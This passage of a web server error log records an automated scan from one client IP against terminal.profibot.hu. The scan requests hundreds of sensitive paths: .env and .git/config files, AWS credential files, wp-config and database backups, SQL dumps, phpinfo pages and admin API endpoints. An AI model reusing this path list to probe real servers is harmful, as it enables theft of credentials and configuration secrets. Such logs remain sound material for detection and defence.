Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/service HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/system/info HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/gateway HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/command HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/admin/user HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/admin/user/password HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/admin/user/status HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/admin/auth HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/admin/role HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/admin/role/id HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/admin HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/v1/sms-sender HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/v1/finchat/contact/manager HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:42 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/v1/finchat/privilege-api/forwarder HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/v1/finchat/privilege-api/forwarder/event HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/v1/finchat/open-api HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/upload HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/savefile HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/v1/files HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/files.remote.share HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/v1/netdisk/download HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /sources/api/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /app/api/bzycs.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /src/api/config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /web/api/config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/.git/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/v1/finchat/open-api/auth/token HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/v1/account/oauth/token HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/v1/account/oauth/ticket HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/v1/tokens HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/login HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/auth HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/authentication HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/auth/v1/pin/verify HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/register HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /api/resetpassword HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vendor/drupal/coder/.git/info/refs HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vendor/drupal/coder/.git/info/exclude HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vendor/drupal/coder/.git/objects/info HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /vendor/drupal/coder/.git/objects/info/packs HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /info.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /info.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /member/space/company/info.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /cmsmessages/information.aspx HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /cmsmessages/information.aspx.cs HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:43 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /module/info/include/mysql/phpcms_info.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo.dev HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo.test HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo-prod HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo-preprod HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo.staging HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo.stg HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo-server HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo-server.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo.srv HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo-api HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfoapi HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo_details.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfo_details HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfomolten.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /phpinfodev HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /shop/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /bitrix/admin/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /mambo/administrator/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /lib/zend/tool/framework/system/provider/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/plugins/phpinfo HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/.git/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /blog/wp-content/themes/.git/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/themes/.git/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/plugins/.git/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/db.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/mysql.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/dump.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/uploads/db.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/uploads/mysql.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/backup/db.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:44 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/backups/db.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/db_backup.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/uploads/db_backup.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/backup/db_backup.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/fullbackup.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/fullwebsite.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/data.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/backup/data.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/uploads/data.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/backups/data.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/backup/database.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/backups/database.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/wordpress.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/backups/wordpress.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/dbdump.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/uploads/dbdump.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/backups/dbdump.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-content/backup/dbdump.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-config.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-config-sample.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-config.php.bak1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /wp-config.bak1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.inc.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /connect.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /connection.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /conn.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /conn.asp.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /connection.asp.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.jsp.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.ini.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/config.inc.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/config_ucenter.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/config_global.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:45 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /bitrix/php_interface/dbconn.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /uc_server/data/config.inc.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /data/config.inc.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /var/debug.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /content/debug.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /npm-debug.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /yarn-debug.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /firebase-debug.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /debug.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /debug.txt.gz HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /debug.tar.gz HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /debug.zip HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /debug.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /debug.sql.tar.gz HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /debug.sql.zip HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /mysql_debug.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /root/.aws/credentials HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.aws/secret_access_key.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.aws/s3/config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.aws/config.yaml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.aws/secrets/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /.aws/secretsmanager/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.php.old HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.inc.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.json.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.js.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config/settings.local.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 185.177.72.13, server: terminal.profibot.hu, request: "GET /config.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 01:44:46 [error] 293#293: *17222 web-terminal could not be resolved (2: Server failure), client: 